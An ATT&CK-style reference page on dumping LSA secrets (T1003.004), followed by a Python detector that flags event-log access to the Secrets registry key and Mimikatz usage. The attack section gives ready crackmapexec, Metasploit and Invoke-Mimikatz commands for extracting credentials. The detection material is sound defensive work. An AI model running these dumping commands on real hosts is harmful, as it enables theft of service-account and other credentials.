LSA Secrets
https://attack.mitre.org/techniques/T1003/004/
ATT&CK ID: T1003.004
Permissions Required: SYSTEM
Description
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.
Techniques
Crackmapexec
crackmapexec smb '10.10.10.100' -u 'moe' -p 'Password123' --lsa

Metasploit
use post/windows/gather/lsa_secrets

Mimikatz
Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'
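
For the defensive side, the following added example (not part of the original page or of any tool listed above) triages Windows events for the two artifacts this page names: access to the Secrets registry key by a process other than lsass.exe, and the lsadump::secrets module string in PowerShell script block logs. It assumes registry auditing (a SACL on the key, Security event 4663) and script block logging (event 4104) are enabled; the sample events, their simplified field layout and the lsass.exe-only allowlist are constructed for illustration.

```python
import re

# Registry path from the page, in the kernel object form logged by event 4663.
SECRETS_KEY = r"\registry\machine\security\policy\secrets"
# Mimikatz module name taken from the page's Invoke-Mimikatz command.
MIMIKATZ_RE = re.compile(r"lsadump::secrets", re.IGNORECASE)
# Assumption: lsass.exe is the only process expected to touch the key.
EXPECTED_READERS = {r"c:\windows\system32\lsass.exe"}

# Constructed sample events (simplified field names, not a real log export).
SAMPLE_EVENTS = [
    {"EventID": 4663, "ObjectType": "Key", "ProcessName": r"C:\Windows\System32\lsass.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal"},
    {"EventID": 4663, "ObjectType": "Key", "ProcessName": r"C:\Users\Public\tool.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets\_SC_ExampleSvc\CurrVal"},
    {"EventID": 4663, "ObjectType": "Key", "ProcessName": r"C:\Windows\regedit.exe",
     "ObjectName": r"\REGISTRY\MACHINE\SECURITY\Policy\SecretsBackup"},
    {"EventID": 4104, "ScriptBlockText":
     "Invoke-Mimikatz -Command '\"token::elevate\" \"lsadump::secrets\"'"},
    {"EventID": 4104, "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
]

def under_secrets_key(object_name):
    """True for the Secrets key itself or any subkey, not look-alike siblings."""
    name = object_name.lower().rstrip("\\")
    return name == SECRETS_KEY or name.startswith(SECRETS_KEY + "\\")

def triage(event):
    """Return a finding string for a suspicious event, else None."""
    if event.get("EventID") == 4663 and event.get("ObjectType") == "Key":
        proc = event.get("ProcessName", "").lower()
        if under_secrets_key(event.get("ObjectName", "")) and proc not in EXPECTED_READERS:
            return f"LSA Secrets key accessed by {event.get('ProcessName')}"
    if event.get("EventID") == 4104:
        hit = MIMIKATZ_RE.search(event.get("ScriptBlockText", ""))
        if hit:
            return f"Mimikatz LSA module in script block: {hit.group(0)}"
    return None

def scan(events):
    """Run triage over all events and keep only the findings."""
    return [finding for finding in map(triage, events) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The registry check keys on the path rather than on a tool name, so it does not depend on which of the listed tools performed the access.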
